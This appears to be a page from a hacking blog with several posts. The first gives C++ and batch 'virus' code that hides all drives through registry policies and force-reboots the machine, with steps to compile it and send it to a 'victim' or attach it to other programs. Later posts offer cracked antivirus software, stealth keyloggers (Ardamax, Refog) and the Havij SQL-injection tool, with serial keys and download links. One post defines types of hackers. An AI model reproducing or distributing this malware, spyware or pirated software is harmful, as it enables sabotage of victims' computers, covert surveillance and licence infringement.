Latest Posts

C++ ,Batch Virus code to disable All Hard disk


C++ ,Batch Virus code to disable All Hard disk


Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself. 
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
1 comment Read More

Introduction to Hacking | Different Types of Hackers


Introduction to Hacking | Different Types of Hackers


1.originally, someone who makes furniture with an axe1. A person who enjoys exploring the details of programmable systems
and how to stretch their capabilities, as opposed to most users,
who prefer to learn only the minimum necessary.

2. One whoprograms enthusiastically (even obsessively) or who enjoys programming
rather than just theorizing about programming.

3. Aperson capable of appreciating hack value. 

4. A person who is good at programming quickly. 

5. An expert at a particular program,
or one who frequently does work using it or on it; as in ‘a
Unix hacker.’ (Definitions 1 through 5 are correlated, and people
who fit them congregate.)

6. An expert or enthusiast of any kind.
One might be an astronomy hacker, for example. 
7. One who
enjoys the intellectual challenge of creatively overcoming or circumventing
limitations. 

8. [deprecated] A malicious meddler who
tries to discover sensitive information by poking around. Hence
‘password hacker,’ ‘network hacker.’ The correct term for this
sense is cracker.

Cracker


One who breaks security on a system. Coined ca. 1985 by hackers
in defense against journalistic misuse of hacker (q.v., sense 8). An
earlier attempt to establish ‘worm’ in this sense around 1981–82
on Usenet was largely a failure.

Use of both these neologisms reflects a strong revulsion against
the theft and vandalism perpetrated by cracking rings. While it is
expected that any real hacker will have done some playful cracking
and knows many of the basic techniques, anyone past larval stage
is expected to have outgrown the desire to do so except for immediate,
benign, practical reasons (for example, if it’s necessary to get
around some security in order to get some work done).
Thus, there is far less overlap between hackerdom and crackerdom
than the mundane reader misled by sensationalistic journalism
might expect. Crackers tend to gather in small, tight-knit,
very secretive groups that have little overlap with the huge, open
poly-culture this lexicon describes; though crackers often like to
describe themselves as hackers, most true hackers consider them a
separate and lower form of life.

It’s clear that the term cracker is absolutely meant to be derogatory. One
shouldn’t take the tone too seriously though, as The Jargon File is done with a
sense of humor, and the above is said with a smile. As we can see from the
above, illegal or perhaps immoral activity is viewed with disdain by the “true
hackers,” whomever they may be. It also makes reference to cracker being a
possible intermediate step to hacker, perhaps something to be overcome.

Script Kiddie


The term script kiddie has come into vogue in recent years. The term refers to
crackers who use scripts and programs written by others to perform their intrusions.
If one is labeled a “script kiddie,” then he or she is assumed to be incapable
of producing his or her own tools and exploits, and lacks proper
understanding of exactly how the tools he or she uses work. As will be apparent
by the end of this chapter, skill and knowledge (and secondarily, ethics) are the
essential ingredients to achieving status in the minds of hackers. By definition,
a script kiddie has no skills, no knowledge, and no ethics.

Phreak


A phreak is a hacker variant, or rather, a specific species of hacker. Phreak is
short for phone phreak (freak spelled with a ph, like phone is). Phreaks are
hackers with an interest in telephones and telephone systems. Naturally, there
has been at times a tremendous amount of overlap between traditional hacker
roles and phreaks.

White Hat/Black Hat/Gray Hat

White Hat Hacker:

White Hat hackers are good guys who does the hacking for defensing.  They probably work an organization for providing security.

Black Hat Hacker

Black hat hackers are bad guys(the malicious hackers or crackers).  They usually steal the other bank information and steal the money. 
They use their skills for illegal purposes.
They are creators of viruses,malware,spyware.
They will destroy your pc.

Gray Hat Hackers


Grey hats are hackers who may work offensively or defensively, depending on the situation.
This is the dividing line between hacker and cracker. Both are powerful forces on the Internet,
and both will remain permanently. And some individuals qualify for both categories. The
existence of such individuals further clouds the division between these two groups of people.
In addition to these groups, there are self-proclaimed ethical hackers, who are interested in
hacker tools mostly from a curiosity standpoint. They may want to highlight security problems
in a system or educate victims so they secure their systems properly. These hackers are
doing their “victims” a favor. For instance, if a weakness is discovered in a service offered by
an investment bank, the hacker is doing the bank a favor by giving the bank a chance to rectify
the vulnerability.
Leave a Comment Read More

ESET NOD32 ANTIVIRUS 5 FULL FREE CRACK

DOwnload free ESET NOD32 ANTIVIRUS 5 [FULL] [FREE] [CRACK]

Image

Built on the award-winning ThreatSense engine, ESET NOD32 Antivirus proactively detects and disables more viruses, trojans, worms, adware, spyware, phishing, rootkits and other Internet threats than any program available.ESET NOD32 Antivirus provides: Proactive Protection: The award winning ThreatSense technology combines multiple layers of detection protecting you from Internet threats before it is too late.Precise Detection: ESET accurately identifies known and unknown threats. It consistently wins top awards from testing labs and is recognized for having zero false positives.1Lightweight Design: Requires less memory and CPU power, allowing your computer to run fast, making more room for games, web browsing, and emailing.Fast Scanning Speeds: Highly efficient program ensuring fast file scanning and product updates. It runs quietly in the background.Proactive, precise, lightweight and fast. You wont find a better antivirus program. 

DOWNLAOD:>

http://turbobit.net/gk8nsjgwxxg0.html
Leave a Comment Read More

AVIRA ANTIVIRUS PREMIUM 2012 12.0.0.888 FINAL CRACK SERIAL KEY

download free AVIRA ANTIVIRUS PREMIUM 2012 12.0.0.888 [FINAL] [CRACK] [SERIAL KEY]

Image 



Avira AntiVir Premium reliably protects you against all threats from viruses, worms, trojans, rootkits, phishings, adware, spyware, bots and dangerous “drive-by” downloads. Best detection rates and top-class security with several updates every day. Advanced protection:
Includes basic antivirus protection PLUS: email protection (POP3), AntiPhishing, AntiSpyware, AntiAdware and more. With real-time on-access scanning, profile-based on-demand scans and scheduling of full system scanning and updates it offers premium protection. It includes a POP3 based MailScanner that scans emails before they are stored on your machine. With a user-friendly control center, quarantine management, fast performance and world leading detection rates the Avira AntiVir Premium provides essential protection for your PC.

AntiVir Personal offers effective protection against computer viruses for the individual and private use on a single PC-workstation. It detects and removes viruses and includes an Internet-Update Wizard for easy updating.


Avira presents the Premium Security Suite with Full protection: Includes basic and advanced antivirus protection, email protection, AntiPhishing, Anti-Spyware and Anti-Adware PLUS: Anti-Spam, Firewall, WebGuard (Safe Surfing), Game Mode and more.! Complete security for workstations! The repeatedly awarded and worldwide used virus and malware protection by over 30 million users now also with WebGuard!
Avira is a German antivirus software company. Its antivirus applications are based on the AntiVir antivirus engine, first launched in 1988. It was called "H+BEDV Datentechnik GmbH" when it was founded. One of the antivirus software, AntiVir Personal, is free for personal usage. Avira is launching a new, comprehensive protection package for end-users as well as small offices and home workers: the Avira Premium Security Suite is a combination of Avira’s brand-new firewall and the proven anti-virus software AntiVir Personal Premium.

Even less experienced users can cope with the numerous security threats from the Internet with the central, intuitively operated user interface of the Suite
 


Serials Works Till 21.1.2012 (Will Update It) 

Image 



Operating systems : 


Works On 32bit/64bit 


Download Links : 


Avira Antivirus Premium



http://rapidshare.com/files/272425335/Avira_Premium_Security_Suite_v_9.0.0.356_Corporate_Key.rar.html 


http://www.filesonic.com/file/2459628354/Avira.Antivir.Premium.2011-2013.fullmaza.com.rar
http://www.fileserve.com/file/CRW3zcC 
https://rapidshare.com/files/669488560/


INSTRUCTIONS:


Download the Avira Premium Antivirus 2012 from there official site and open it.While installing where it ask for key upload the Any of the Avira Key that you have downloaded from here . And just let is install BUT REMEMBER TURN OFF YOUR INTERNET OTHER WISE IT WONT WORK!


QMVT7EMYH9NQ
1 comment Read More

ARDAMAX KEYLOGGER V3.8.9 LATEST FULL FREE CRACK SERIAL KEY

download free ARDAMAX KEYLOGGER V3.8.9 LATEST [FULL] [FREE] [CRACK] [SERIAL KEY]



Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.



Keylogger Features:

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!
* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.
* Network delivery - sends recorded logs through via LAN.
* Clipboard logging - capture all text copied to the Windows Clipboard.
* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.
* Visual surveillance - periodically makes screenshots and stores the compressed images to log.
* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o AIM
o Windows Live Messenger 2011
o ICQ 7
o Skype 4
o Yahoo Messenger 10
o Google Talk
o Miranda
o QiP 2010
* Security - allows you to protect program settings, Hidden Mode and Log file.
* Application monitoring - keylogger will record the application that was in use that received the keystroke!
* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/2003/XP/Vista/Windows 7 support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Enjoy;)

Download: This file is full Ardamax (Latest) Keylogger with no activation needed, downloaded from their official site. Just Downlaod and ENJOY ;)

ARDAMAX 3.8.9 ::: HERE (without remote package)


ARDAMAX 3.7.8 ::: http://www.box.net/shared/lidooniyjv (FULL)


Ardamax 3.7.6:::http://www.box.net/shared/dzp1m8koen (FULL

SERIAL KEY :
==========

Name: Luiz Ricardo P Oliveira
serial: 3F1A-54F8-032C
1 comment Read More

REFOG KEYLOGGER V5.1.8.934 + SERIAL [ FULL VERSION ] [CRACK]

REFOG KEYLOGGER V5.1.8.934 + SERIAL [ FULL VERSION ]       [CRACK]
          Download free REFOG KEYLOGGER V5.1.8.934 + SERIAL [ FULL VERSION ] [CRACK]




Concerned About Your Children Safety? 

If your kids spend time chatting or playing computer games, they can be approached or threatened by the strangers. Internet has anonymity, and anonymity means impunity in the minds of molesters. The solution? Violate their anonymity by monitoring your kids’ activities! 
REFOG Personal Monitor is designed to deal with extended families, but it fits small families just as easy. Allowing you to monitor your children activities remotely over the Internet, REFOG Personal Monitor does not even require your close presence in order to be alerted about suspicious activities of either your children or someone they chat with. 

Easy To Install and To Use 
REFOG Personal Monitor can be set up and used by anyone. The monitor does not involve a steep learning curve and does not demand a degree in Computer Science to configure and operate. Simply download your free trial version and get yourself going! 
Remote Monitoring 
REFOG Personal Monitor provides the necessary degree of interactivity, allowing you to monitor your kids’ actions remotely over the email. There’s no need to rush home during the launch hour just to check the logs. See what your kids are doing with their computer without leaving your office! 
Real-Time Alerts 
Should you be worried now or later? If you want constant protection of your family, simply logging keystrokes and storing screen captures is not enough. Often, an immediate action is required to get your kids out of trouble. 
REFOG Personal Monitor is highly flexible, allowing you to configure multiple alerts on harmful or offensive keystrokes sent or received on their computer. Set your alarms, and get notified instantly with real-time alerts if a pre-defined event happens on their PC. 
You can easily set REFOG Personal Monitor to alert you by e-mail. Templates are available to filter keystrokes that contain pre-defined trigger phrases, making false alerts hardly possible. 
Save Screens and Key Presses 
REFOG Personal Monitor keeps a list of all activities you specify it to log. It records all visited Web sites, keeps logs of chats and instant messenger conversations as well as other things typed or received by your kids in chats, messengers, blogs, forums and other online and offline applications. 
REFOG Personal Monitor saves each key pressed and every phrase typed, and makes periodic captures of the computer screen to better illustrate what was going on at that moment. 
Capture Chats and Instant Messengers 
REFOG Personal Monitor captures every key that they press, but does not stop there. Individual keystrokes are of little use when analyzing your kids’ behavior. REFOG Personal Monitor can detect popular chats and instant messengers, and forms clearly legible and readable logs containing chats and instant messenger conversations formatted in a manner that is convenient to read. 
Stealth Operation 
For even better protection, REFOG Personal Monitor can be completely hidden from your kids’ eyes. It runs silently and unobtrusively on their PC while taking screen shots and recording every key that they press, logging applications that they use and Web sites that they visit. You can access these logs either locally or remotely at any time, even if you are not at home! 

Keystroke recording
 
Once installed and running, Refog registers all keys pressed by a user, thus acting as a keylogger. This function captures all data that has been entered by your children or an employee using a keyboard, including chats, usernames, passwords, emails, search queries and other content. In addition to key logging, Refog is also able to log clipboard text. 
Web history logging 
Even if users delete their browser's history, the informaton is retained in Refog's log database and always available via the reports function. All relevant information is collected including URLs visited, page titles and the timestamp. 
Screenshot history 
With customizable capability, Refog takes full color screenshots of a desktop screen. This ensures that the log of what is being typed by the user is backed up with visual evidence of exactly what they are doing. Without being monitored, it is often the case that employees get carried away with excessive web surfing, shopping and other personal tasks. With screenshot history, it is always possible to gather evidence if an employee is wasting the company's time. Multiple monitor configurations are supported! 
Invisible mode and password protection 
You may not want to disclose the act of PC monitoring, so Refog can work in special stealth mode, making it completely invisible even to a skilled PC user. It cannot be found in the program folder, control panel or tray. When required, the program can be revealed using a special command or hotkey. In addition, it is possible to protect Refog with a password, so users are unable to erase their logs. 
Application monitoring and file tracking 
Refog is able to record all programs executed on your PC, so it is possible to establish if your kid is playing games instead of doing his homework, an employee is wasting time offline (e.g. playing solitaire instead of working). In addition to programs, Refog stores all file operations (e.g. open, edit, copy, delete), and can reveal inappropriate interest in specific confidential documents. 
IM monitoring 
Refog is also compatible with all major instant messaging software (e.g. AIM, Facebook®,Yahoo! messenger, Skype, ICQ, Google Talk, MSN). It is not only able to log outgoing messages by a local user, but also incoming messages too. 
Email reports 
It is not necessary to gain physical access to monitored computers in order to view their logs. All reports can be delivered via email, and can be read anywhere. 
Comprehensive settings and reports 
It is possible to set the control levels of monitoring, enable/disable monitoring for given users, setup alert keywords and reports delivery, easily filter log files and much more. With this armory of tools, Refog comes preconfigured so it can be installed in just a few clicks and run with default settings, requiring no tech skills at all! 

Refog Personal Monitor works great with all modern Windows OS releases: Windows XP®, Windows Vista®, Windows 7®
 

Installation Notes
 
Run setup file 
Enter the serial 
Enjoy

DOWNLOAD FROM::
http://ca.isohunt.com/download/295579713/refog.torrent
1 comment Read More

HAVIJ 1.15 PRO FREE CRACK

                             HAVIJ 1.15 PRO FREE CRACK
            download free HAVIJ 1.15 PRO  CRACK






OR

Instruction:
---------------



1:>Run Havij.exe

2:> Once it opens you will see register..








3:> Click Register Make sure you are connected to the internet






4:> Under Name: You write:Your Name or anything
5:>Under File: You select the folder where you are currently running the Havij program from and select Havij Key


6:> Done....
 
1 comment Read More